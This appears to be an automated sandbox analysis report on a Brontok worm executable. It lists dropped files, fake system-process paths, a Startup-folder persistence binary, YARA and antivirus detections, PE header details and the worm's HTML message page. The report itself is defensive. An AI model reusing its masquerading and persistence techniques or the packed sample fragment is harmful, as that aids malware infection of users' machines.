                                      Reputation:unknown
                                      Preview:Invalid Request

                                      C:\Users\user\AppData\Local\Kosong.Bron.Tok.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\winlogon.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):51
                                      Entropy (8bit):4.414798567708406
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:C943AE4292F2EA5D3A9FEA05D9AF4039
                                      SHA1:B03418E2F34D43C6602D385C36F6B817DC57C6E5
                                      SHA-256:D9E768F8B796558E7E8D720EBC599067B1017440BCA545028472001F399E7400
                                      SHA-512:0C5037A28D76242A39412B1BA46BC1741EAF028C3FCAC11E8C45E6EC5A323378A1C68309A2385F1FB86A4A8EFD24E3E06AF72E8BE465F6BC7627FA3C8B2F66EB
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:Brontok.A..By: HVM31..-- JowoBot #VM Community --..

                                      C:\Users\user\AppData\Local\ListHost18.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\inetinfo.exe
                                      File Type:HTML document, ASCII text, with very long lines (7793), with no line terminators
                                      Category:dropped
                                      Size (bytes):7793
                                      Entropy (8bit):6.162751209859967
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:28F8ED3AA6096EC65308B44E71087CC2
                                      SHA1:74AB22E65DE276A266356D0031B0A8BF3B5ECBA9
                                      SHA-256:02B73B372D7168F2F88B20C8B1435CEDECD6D7EFD4F71848D5C71CE0A4E4787B
                                      SHA-512:3136A9F65EA2E40F4053E2C70470DA112FD70F68E2EB7AF0F9153674F089344DEAEC60FC27B900AF495207920AAB0267526A5A6D5A66751CE2B816F4C3EEB996
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i

                                      C:\Users\user\AppData\Local\Microsoft\Windows\2057\StructuredQuerySchema.bin

                                      Download File
                                      Process:C:\Windows\SysWOW64\explorer.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):423818
                                      Entropy (8bit):5.375342137412923
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:64A3E7576CF5C372B32425F19E7DA148
                                      SHA1:33D20D9F1C90BA594F1ED934EDA6F74489B390B9
                                      SHA-256:57E97D2C6B44FC33263BB6D54C4A856781F92AA0DB9DC9E238DE1F5CF0825AEF
                                      SHA-512:DC43BECFB76416B959736777883B65823F9F2B0343DF93D9667DB250C51BDB70BE994BCBBC43C316AA743CB81875E5EB6995D7B16A7F877D563CA7D936931A0A
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:...P................d...................D...................System.StructuredQueryType.Action.System.StructuredQueryType.AllBitsSet.System.StructuredQueryType.AnyBitsSet.System.StructuredQueryType.Blurb.System.StructuredQueryType.Boolean.=TRUE.=FALSE.System.StructuredQueryType.ByteUnit.=1.=1024.=1048576.=1073741824.=1099511627776.=1125899906842624.=1152921504606846976.=1000.=1000000.=1000000000.=1000000000000.=1000000000000000.=1000000000000000000.System.StructuredQueryType.DateTime.N00UUUUUUUK7ZZNNU.N00UUUUUUUK1ZZNNU.N00UUUUUUUK2ZZNNU.N00UUUUUUUK3ZZNNU.N00UUUUUUUK4ZZNNU.N00UUUUUUUK5ZZNNU.N00UUUUUUUK6ZZNNU.N00UK1UUUUUUZZNNU.N00UK2UUUUUUZZNNU.N00UK3UUUUUUZZNNU.N00UK4UUUUUUZZNNU.N00UK5UUUUUUZZNNU.N00UK6UUUUUUZZNNU.N00UK7UUUUUUZZNNU.N00UK8UUUUUUZZNNU.N00UK9UUUUUUZZNNU.N00UK10UUUUUUZZNNU.N00UK11UUUUUUZZNNU.N00UK12UUUUUUZZNNU.R00UUUUUUUUZDNNU.R00UUUUUUUUD-1DNNU.R00UUUUUUUUD1DNNU.R00UUUUUUUUZZXD-1NU.R00UUUUUUUUZZXD1NU.R00UUUUUUUUZWNNU.R00UUUUUUUUW-1WNNU.R00UUUUUUUUW1WNNU.R00UUUUUUUUZZXW-1NU.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\domain_profile[1].htm

                                      Download File
                                      Process:C:\Users\user\AppData\Local\svchost.exe
                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (952), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):45255
                                      Entropy (8bit):5.4236523451384056
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:1D0CAC72508CECE52B0746861E37A1B3
                                      SHA1:17576F47D93B90A7B74361B0EDB34BB41E405D8F
                                      SHA-256:DD26706C217229CE141A799487D54991BB5B7EE9D59FFB8F1598B9DCA3374E25
                                      SHA-512:7D40A3E4554B5910677B2BD4A4DD38D762F5AB8E0B0B01B257C422AFE00A45BC72879CC0A1302EF143DA3AF18B2D2AA93A28EC5DF8BA991EF89EC3627D5B9A2F
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. Start cookieyes banner -->..<script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script>.. End cookieyes banner -->..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. Required meta tags -->..<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">..<link rel="preconnect" href="https://www.google.com">..<link rel="preconnect" href="https://www.gstatic.com" crossorigin>..<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />..<link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css">..<link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a">..<link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/responsive.css?aa=2021-06-09a">..<link rel="stylesheet" href="https

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\C7S8M5VS\Bron-IDUTSPLD[1].htm

                                      Download File
                                      Process:C:\Users\user\AppData\Local\lsass.exe
                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):167
                                      Entropy (8bit):4.43745738033235
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:0104C301C5E02BD6148B8703D19B3A73
                                      SHA1:7436E0B4B1F8C222C38069890B75FA2BAF9CA620
                                      SHA-256:446A6087825FA73EADB045E5A2E9E2ADF7DF241B571228187728191D961DDA1F
                                      SHA-512:84427B656A6234A651A6D8285C103645B861A18A6C5AF4ABB5CB4F3BEB5A4F0DF4A74603A0896C7608790FBB886DC40508E92D5709F44DCA05DD46C8316D15BF
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>cloudflare</center>..</body>..</html>..

                                      C:\Users\user\AppData\Local\Temp\~DF46D496EB2F85038A.TMP

                                      Download File
                                      Process:C:\Users\user\AppData\Local\inetinfo.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):13038
                                      Entropy (8bit):3.5685882876044626
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:8E4F39DEC4170B7878DB59D3B4C68049
                                      SHA1:57DB9B87F9652247FA521BE7BA9363F8ED01EA68
                                      SHA-256:89C1DD3CB1A92C84259FEC1F5C51415895FEF892EDC61E0E8CA3B4287D8A724D
                                      SHA-512:DBD6411C4C74C628004618D8D2CD4CBF1DEFF3B4CBA57BDE0264B14EF4EE8204609776FC22F4F5A8ABC82917A871E79337D7140DA4EA736AABAD5245340C0D7B
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\~DF6EFAC80E34D11BD1.TMP

                                      Download File
                                      Process:C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):13038
                                      Entropy (8bit):3.568095523808254
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:FB6C52197D1DE8373BACE6DC85084424
                                      SHA1:1512E3A62D4DD4B70B0763A4D1A0AFB4F90F87A9
                                      SHA-256:E0AFF92D5FE75EC78ECE8B2AB9FDD6BEF786938DAE3888D0A716C00B06652229
                                      SHA-512:A3E28275F5173710982C6FC90EFC8CBFC3F7487F7BB7269CAA3806D8FA457ACCA02C1C0D75B6D800D6CC9E8CA23E2EB235C7FB070D0E116836B95FD3650BE4D9
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\~DF7F721CFD06E3C854.TMP

                                      Download File
                                      Process:C:\Users\user\AppData\Local\services.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):16384
                                      Entropy (8bit):3.008611795358183
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:D5A5D8AE6D41DEE190F46AADCF2DA5B7
                                      SHA1:F8D6AA893D8A4CF54746C6B74E10F9338F3A231E
                                      SHA-256:50546746247BBF109BC16FA36B70F8DBBAF28B597A9F34A77C5F526C209B8BD2
                                      SHA-512:44B84E17656950DFC922BF19D47073A54CA0B60AB6EDF70B742738C83302D928AABD30CC0844A16D88457A57D69557D2CDD61994C98667A1889DE43C280C4398
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\~DFE97ADC93D9B82EB6.TMP

                                      Download File
                                      Process:C:\Users\user\AppData\Local\smss.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):13038
                                      Entropy (8bit):3.5674694812999976
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:63E52F9609E1B40D2453139175DC76CD
                                      SHA1:7409346D174F8865D3F2D627A4A1779B3306A307
                                      SHA-256:DB614CED6B586CE5B5A95E166BF5D78EAD337D8C25D551C0B3E4D153C28EEC9E
                                      SHA-512:7ACF8DC0A4DDACB6371C91CA5B84041F977984D5DE073DBBA20F731518945EA13285358059D4C8CC7DD64077CA8190DE9A707DB9C0B2C68CC1744E933A9EFFC9
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\~DFF7082348CD4F4988.TMP

                                      Download File
                                      Process:C:\Users\user\AppData\Local\svchost.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):13038
                                      Entropy (8bit):3.5682653151622565
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:B80C75B3FA13DA853AF00F3405F2D9A2
                                      SHA1:15BD494CF4F22003C7A7123D68E236198FA606EB
                                      SHA-256:31F15428F9021009F44611CD63B5BADA898ED5B929057FDE0109DEA4286333CB
                                      SHA-512:B75A3206FFF29DD599A58620B78EC80823CF338D38B11C8FA0CA33AD2CF335D52F40BEB5527F3692777F6CDBBD8A77CD43B4D81A28216C3F30EF83C809107F56
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Update.18.Bron.Tok.bin

                                      Download File
                                      Process:C:\Users\user\AppData\Local\inetinfo.exe
                                      File Type:HTML document, ASCII text, with very long lines (7808), with no line terminators
                                      Category:dropped
                                      Size (bytes):7808
                                      Entropy (8bit):6.163032638276561
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:04F21D16EB31DEEF7199C728FEA8101C
                                      SHA1:ED0332CBDF819AB5845090C2A74F139784B43E35
                                      SHA-256:797091D76BA7A6E43D47EA7C176882BFF9CC483ADCCD0D61B0482949F32E9B64
                                      SHA-512:323D2F6171CB4A24BD2BBFFC9A504FFBBC911B64A2E7415523BC89C1EDA27D81F37FA59A06C57D6D9DE325F4F7EA8F3768A5EB57D3F00629FAEDE2C691F13954
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif

                                      Download File
                                      Process:C:\Users\user\AppData\Local\smss.exe
                                      File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45327
                                      Entropy (8bit):7.334225843037343
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:32798AD1498394AC5602E8801B00AADB
                                      SHA1:D9720C040D947477392E68B92A0575B8D9D31609
                                      SHA-256:1AFB0258C432833BAEFE232E6F0C2015259F536670E2A8FE1CB6B191776C7864
                                      SHA-512:7E5E9BF1DFAA68C8C3F89016EA6A56C108A928F1C2AF90D94CE1C16DEADE204FBF8A1ED2338C9C62AD59F681C743A3B6B3B0B95E1E542484B3F6EF8F712A4AF6
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: INDICATOR_EXE_Packed_MEW, Description: Detects executables packed with MEW, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, Author: ditekSHen
                                      • Rule: INDICATOR_EXE_Packed_MEW, Description: Detects executables packed with MEW, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, Author: ditekSHen
                                      • Rule: INDICATOR_EXE_Packed_MEW, Description: Detects executables packed with MEW, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, Author: ditekSHen
                                      • Rule: INDICATOR_EXE_Packed_MEW, Description: Detects executables packed with MEW, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, Author: ditekSHen
                                      • Rule: INDICATOR_EXE_Packed_MEW, Description: Detects executables packed with MEW, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Reputation:unknown
                                      Preview:MZ..........PE..L.................................................@.................................................................................................................................................................................................BLD.F....P................................u.........`............................`B....P.........s.3...s.3...s!..A......s.u>....v^.......u..S..&...t/.....H.....S.=.}..s....s....w.AA....V..+..^...u.........V.<.u..S.V...@Yt.y..<.u..@PU.S....u....3.A......r...............`B.,.@../@..YB..8.@.MSVB..60.DL..._.v.baStrI2..C.cos..adj.fptun, 4..~V.MxoSe.>F...%..LBnBst..m-.Lin.I.p7ut5...S.D.<@v...ePN3)..iv.m)64tgOujb0.....m13#R.cAn.siToUn.$2..q..Co.pyB.tes8.C...[o.E.ch.Hl%Ad(.s.etFix=. .y..8Er.o..H.su.ltCh.k.....[..32.AryG<1.De.Yuc.PEx.idP.cqOnNph..X.16.=......f#..$J.....m..pRL8..;(n'dv.wI.8;hk.X.@ileC.1/Q.EV.NT._SI]Kr.R,i..HG.rHr`v.BouJds....Cmp+......4..2.DA.F.p.:io.j.VS..M...mP.~...e..L..c.CV.].7H..(.-.3..h2..a...W#..qrt!xQu.

                                      C:\Users\user\Pictures\about.Brontok.A.html

                                      Download File
                                      Process:C:\Users\user\AppData\Local\winlogon.exe
                                      File Type:HTML document, ASCII text, with very long lines (910), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):978
                                      Entropy (8bit):5.522758802993206
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:01AC9232533E8450263B99B05A45ED98
                                      SHA1:95C11E32B82B4470B53EC919EB64AF32D79D0DBF
                                      SHA-256:62D82408A8FF3E6F10BAFBF5A7A16AE34153AB0E930038CE4221C9D155FDDF0B
                                      SHA-512:9743FDA6F5FE418095BEEB4CE7C6F8956C8DC66B62A1DF8847D6FDD750B6B9DC383C5642A5DE876E95E11D18652CBAA0AC6DC4D953C5F30BB8F515A474BBF0E0
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<HTML><HEAD><TITLE>BRONTOK.A[18].NorBet [ By: HVM31 -- JowoBot #VM Community ]</TITLE></HEAD><BODY bgcolor=#79C107><CENTER><H1><Font face=Verdana color=#FF0000><U>BRONTOK.A[18].NorBet</U></Font></H1><H3><Font face=Verdana color=#FFFFFF>-- Hentikanlah kebobrokan di negeri ini --<br><br>1. Penjarakan Koruptor, Penyelundup, Tukang Suap, & Bandar NARKOBA<br>( Send To NUSAKAMBANGAN)<br><br>2. Stop Free Sex, Aborsi, & Prostitusi<br>( Go To HELL )<br><br>3. Stop pencemaran lingkungan, pembakaran hutan & perburuan liar. <br><br>4. Stop Pornografi & Pornoaksi<br><br>5. SAY NO TO DRUGS !!!<br><br><br><font color=#1122FF size=5>-- KIAMAT SUDAH DEKAT --</font><br><br><br>Elang Brontok (Spizaetus Cirrhatus)<br><H2><Font face=Verdana color=#E2EA05>[ By: HVM31 ]<br>-- JowoBot #VM Community --</Font></H2></font></h3><h4>!!! Akan Kubuat Mereka (VM lokal yg cengeng & bodoh) Terkapar !!!</h4></CENTER></BODY></HTML>..<Script Language=Javascript>..alert ("Anda Setuju?");..</Script>..

                                      Static File Info

                                      General

                                      File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.334225843037343
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.29%
                                      • Mew compressed Win32 Executable (67782/24) 0.67%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Targa bitmap (Original TGA Format) (7/2) 0.00%
                                      File name:Pedang @ P#U00ecsau.exe
                                      File size:45'327 bytes
                                      MD5:32798ad1498394ac5602e8801b00aadb
                                      SHA1:d9720c040d947477392e68b92a0575b8d9d31609
                                      SHA256:1afb0258c432833baefe232e6f0c2015259f536670e2a8fe1cb6b191776c7864
                                      SHA512:7e5e9bf1dfaa68c8c3f89016ea6a56c108a928f1c2af90d94ce1c16deade204fbf8a1ed2338c9c62ad59f681c743a3b6b3b0b95e1e542484b3f6ef8f712a4af6
                                      SSDEEP:768:jOx/pm31OEkuz13gXPPeylSNVPYyl5YtESv+UOv35BMC7:iBpm31nku+Xeyggylmw5v
                                      TLSH:7B13AE51431CDADEC1B26635DE2D216A3BE51C334936F1EB8CA2BE0B6DB5C2395C2903
                                      File Content Preview:MZ..........PE..L.................................................@............................................................................................................................................................................................

                                      File Icon

                                      Icon Hash:3686f0ca42720e01

                                      Static PE Info

                                      General

                                      Entrypoint:0x430ef6
                                      Entrypoint Section:u
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:
                                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:87bed5a7cba00c7e1f4015f1bdae2183

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007F7F84FDF6AEh
                                      or al, 60h
                                      add al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      int 0Eh
                                      add eax, dword ptr [eax]
                                      or al, 60h
                                      add al, byte ptr [eax]

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x30efb0x14u
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x30dcd0x100u
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      BLDF0x10000x250000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      u0x260000x1a0000xaf0f1db6ea176983ec9118b86f589f898b48False0.7850050206404106data7.358577776223794IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x2e0e50x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 69120.16984732824427481
                                      RT_ICON0x2fd8d0xca8Device independent bitmap graphic, 32 x 64 x 24, image size 30720.16944444444444445
                                      RT_ICON0x30a350x368Device independent bitmap graphic, 16 x 32 x 24, image size 7680.2511467889908257
                                      RT_GROUP_ICON0x30d9d0x30data0.9375

                                      Imports

                                      DLLImport
                                      kernel32.dllLoadLibraryA, GetProcAddress